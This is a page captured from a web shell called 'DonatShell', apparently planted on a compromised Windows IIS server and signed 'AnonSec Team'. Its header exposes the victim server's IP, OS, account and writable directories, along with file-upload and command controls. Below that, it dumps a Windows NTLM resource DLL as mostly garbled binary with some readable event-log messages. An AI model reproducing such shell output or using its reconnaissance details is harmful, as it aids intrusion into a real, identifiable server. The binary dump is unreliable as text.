DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/SysWOW64/en-US/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/SysWOW64/en-US//msv1_0.dll.mui
MZ@	!L!This program cannot be run in DOS mode.

$uEEELlDLl
DRichEPELi[J!	B`@A.rsrcPB@@00NH`x@				 X!!+HMMOFDATAMSV1_0MUIFOMBhoDS}T(EB?B	!0(K&&@$
0/@l0-1	Ie@ȣxD6D	'&	P%(cDE bo,E8qAc{HTMNŕxTaO`
 Z	<^cPYPD"u d'SP^
r
)D^ar,4	CO[&BD;,%z(D8&1axq0#Duh&hR8chQH	 Ώ ə]~YBg+GlH`M~ ?;/l8
ATdp`pbE9#]!B]R:B!S'TAA:0DLPx8ķPw_i!v<uczxqO$sK{1M Kșz5hP#D=(aGzQJ@7wap)!zؒ4`Q?|1Pc8XOYȷ c8ň1X6젞l|~yNPan<6Iم)e:s BaPG!J?^0ܓ?i|g8<,(#fr^|aPqoQ`1پhcFCFf/<Csc8>-> oq:ᱱ1D~sFq x7	`y|G{_qB'hG#ゎ}OL!#~`;@$# q>A0/zdY8\FQp?`cu
Or:X
u*Y`% ѣ'WuGZN}	!C#H9I{NapY5c3ȁ=!cĝRnhTsƝpƘ5xO5`?j6ñkX28ܨҨq7`qS>| 	B`P70^6^q*B[]ssHQNQ@GE!JP>Ā46?hC8<.仑0uot`'QɅ)g$1$,'	wǰ\ ij~,x8cA,i0$p98	k>`|30eʀ9aI)!3`ŃP\ԙ|
I_'hIV[FA}`a_}b=ށC&=[	,{4!||d14=#ŀ1`,Å
"l03QwǸt^F|gg ?MƠ'	p%:_[C~T{ZC`u3.s:L=ip:#9`,0CCxLxte‡-c3ȁ=!##F3
m{4PaaFI>_ᜍ1=jF<j۱wi?fDӃdbrab2$ggp
N lC!8qOlF;_gpG`q~B>e4~#pk8b 71#!ij<rx/>q
y	3gܗup9j̭wpnQ6;95,nԀ1-p-"01젧'vD>n9szry'Pyc!?p6B`PgT='
s2;G0cUw_ĢNXE_
Għ~2ta;|HQs
r>酠oRFG6!~
u0/} OGPsL")>Cls'
jBiI4^<WJ#?04m!'
7Ga%z23bo@^9q;<yԸ$\8»"PH܉!
Vy/T<
w|8$cTˁqǑ=O"<%K6z3(g!($:f"X0,Ƃq1~R"ӎ`"Y,cƂ1cg`XY0,,v1;9<Xma/Ly^7Hxu7jX{s#=	|
K{8
9	zwD԰|ĝtg7O	G)Oopx;\ zJA#JA辈/ɾy:ĀuwNia|g9?q`p.Dͦu`mx<{܍ظIߤY~A Xg7=#`|QFA}fZ˗~A
|a's},iʅAe?,e'#Cѽ_]|;|~#9
_0m$?#.
,902q(pc0<LhcC
 "ǁ18zZళ]#dװс}F%ŚG`9aB52=N𚀽'	LATEԉf3;UI`PSS;9犇`rnG;avzh!<pG`pzO4Cxj|Ýh$s:y0œO'TCDOCopsp(qp.HG7zJ4AFPcI?hsOcf	7~#8W`
yӝDž9DLwp#wK?nch3
w˵MSO*n@tF&>A'(zX8"A>+ĝwVy܇;w\F!o(8v;
p<E}
/S(C0sy0?6:G90N{H\p4`~qr !4Q<78a=?`<8
mhԪAeS1c뉠9?@Y#kaJtl TK(s3V@XV- ,i3m8BaC$@>U L+g#|!z_nk ,G@NBaB_"q|{L? &#H!Aw@D@D~ao D8
y 	Ah@T!	" T	aqAfyoY>
zN"AX@/Q@D8
4:@(yR2AX@46
D~7<@,{"Ad	nXM~61Z` &D@DQ@$
A~4?E b|
QI@D2
P
$!kR@dW~۞?\OzMOFDATAMUIen-USPPLppdXACWarning

 Information

$Blocking NTLM

$Auditing NTLM

Max

8Microsoft-Windows-NTLM

PMicrosoft-Windows-NTLM/Operational

NTLM client blocked: Outgoing NTLM authentication traffic to remote servers that is blocked.%nTarget server: %1%nSupplied user: %2%nSupplied domain: %3%nPID of client process: %4%nName of client process: %5%nLUID of client process: %6%nUser identity of client process: %7%nDomain name of user identity of client process: %8%nMechanism OID: %9%n%nNTLM authentication requests from this computer are blocked.%n%nIf you want to allow this computer to use NTLM authentication, set the security policy Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers to Allow all.%n%nIf you want only the target server %1 to accept NTLM authentication requests from this computer, set the security policy Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers to Deny all and then set the security policy Network Security: Restrict NTLM: Add remote server exceptions and list the target server %1 as an exception to use NTLM authentication.

NTLM server blocked: Incoming NTLM traffic to servers that is blocked%nCalling process PID: %1%nCalling process name: %2%nCalling process LUID: %3%nCalling process user identity: %4%nCalling process domain identity: %5%nMechanism OID: %6%n%nNTLM authentication requests to this server have been blocked.%n%nIf you want this server to allow NTLM authentication, set the security policy Network Security: Restrict NTLM: Incoming NTLM Traffic to Allow all.

NTLM server blocked in the domain: NTLM authentication in this domain that is blocked%nUser: %1%nDomain: %2%nWorkstation: %3%nPID: %4%nProcess: %5%nLogon type: %6%nInProc: %7%nMechanism: %8%n%nNTLM authentication within the domain %2 is blocked.%n%nIf you want to allow NTLM authentication requests in the domain %1, set the security policy Network Security: Restrict NTLM: NTLM authentication in this domain to Disabled.%n%nIf you want to allow NTLM authentication requests only to specific servers in the domain %1, set the security policy Network Security: Restrict NTLM: NTLM authentication in this domain to Deny for domain servers or Deny domain accounts to domain servers, and then set the security policy Network Security: Restrict NTLM: Add server exceptions in this domain to define a list of servers in this domain as an exception to use NTLM authentication.

,NTLM Minimum Client Security Block:%nCalling process PID: %1%nCalling Process Name: %2%nNegotiated Security Flags: %3%nMinimum Security Flags: %4

,NTLM Minimum Server Security Block:%nCalling process PID: %1%nCalling Process Name: %2%nNegotiated Security Flags: %3%nMinimum Security Flags: %4

NTLM client blocked audit: Audit outgoing NTLM authentication traffic that would be blocked.%nTarget server: %1%nSupplied user: %2%nSupplied domain: %3%nPID of client process: %4%nName of client process: %5%nLUID of client process: %6%nUser identity of client process: %7%nDomain name of user identity of client process: %8%nMechanism OID: %9%n%nAudit the NTLM authentication requests from this computer that would be blocked by the target server %1 if the security policy Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers is set to Deny all.%n%nIf you want all servers to accept NTLM authentication requests from this computer, set the security policy Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers to Allow all.%n%nIf you want only the target server %1 to accept NTLM authentication requests from this computer, set the security policy Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers to Deny all, and then set the security policy Network Security: Restrict NTLM: Add remote server exceptions and list the target server %1 as an exception to use NTLM authentication.

NTLM server blocked audit: Audit Incoming NTLM Traffic that would be blocked%nCalling process PID: %1%nCalling process name: %2%nCalling process LUID: %3%nCalling process user identity: %4%nCalling process domain identity: %5%nMechanism OID: %6%n%nAudit NTLM authentication requests to this server that would be blocked if the security policy Network Security: Restrict NTLM: Incoming NTLM Traffic is set to Deny all accounts or Deny all domain accounts.%n%nIf you want this server to allow NTLM authentication, set the security policy Network Security: Restrict NTLM: Incoming NTLM Traffic to Allow all.

 NTLM server blocked in the domain audit: Audit NTLM authentication in this domain%nUser: %1%nDomain: %2%nWorkstation: %3%nPID: %4%nProcess: %5%nLogon type: %6%nInProc: %7%nMechanism: %8%n%nAudit NTLM authentication requests within this domain that would be blocked if the security policy Network Security: Restrict NTLM: NTLM authentication in this domain is set to Deny for domain servers or Deny domain accounts to domain servers.%n%nIf you want to allow NTLM authentication requests in the domain %1, set the security policy Network Security: Restrict NTLM: NTLM authentication in this domain to Disabled.%n%nIf you want to allow NTLM authentication requests to specific servers in the domain %1, set the security policy Network Security: Restrict NTLM: NTLM authentication in this domain to Deny for domain servers or Deny domain accounts to domain servers, and then set the security policy Network Security: Restrict NTLM: Add server exceptions in this domain to define a list of servers in this domain to use NTLM authentication.

4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft Corporationt&FileDescriptionMicrosoft Authentication Package v1.0l&FileVersion6.1.7600.16385 (win7_rtm.090713-1255)6InternalNameMSV1_0.DLL.LegalCopyright Microsoft Corporation. All rights reserved.FOriginalFilenameMSV1_0.DLL.MUIj%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING

Anon7 - 2022
AnonSec Team